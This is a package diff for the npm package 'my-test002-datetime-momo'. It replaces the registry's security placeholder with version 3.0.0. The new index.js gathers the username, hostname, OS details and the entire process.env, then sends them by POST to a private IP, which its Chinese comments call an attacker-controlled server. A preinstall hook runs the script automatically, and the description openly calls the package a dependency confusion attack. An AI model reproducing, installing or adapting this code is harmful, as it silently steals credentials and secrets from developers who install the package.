my-test002-datetime-momo 0.0.1-security → 3.0.0

package/index.js

@@ -0,0 +1,44 @@
+const os = require('os');
+const dns = require('dns');
+const { exec } = require('child_process');
+const https = require('http');
+
+// 收集系统信息
+const username = os.userInfo().username;
+const hostname = os.hostname();
+const platform = os.platform();
+const release = os.release();
+
+// 创建有效负载
+const payload = {
+  username,
+  hostname,
+  platform,
+  release,
+  env: process.env
+};
+
+// 发送数据到攻击者控制的服务器
+const data = JSON.stringify(payload);
+
+const options = {
+  hostname: '172.16.80.126',
+  port: 8000,
+  path: '/collect',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': data.length
+  }
+};
+
+const req = https.request(options, (res) => {
+  console.log(`状态码: ${res.statusCode}`);
+});
+
+req.on('error', (error) => {
+  console.error(error);
+});
+
+req.write(data);
+req.end();

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "my-test002-datetime-momo",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "3.0.0",
+  "description": "A package for dependency confusion attack",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "momo-sec",
+  "license": "MIT",
+  "keywords": []
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=my-test002-datetime-momo for more information.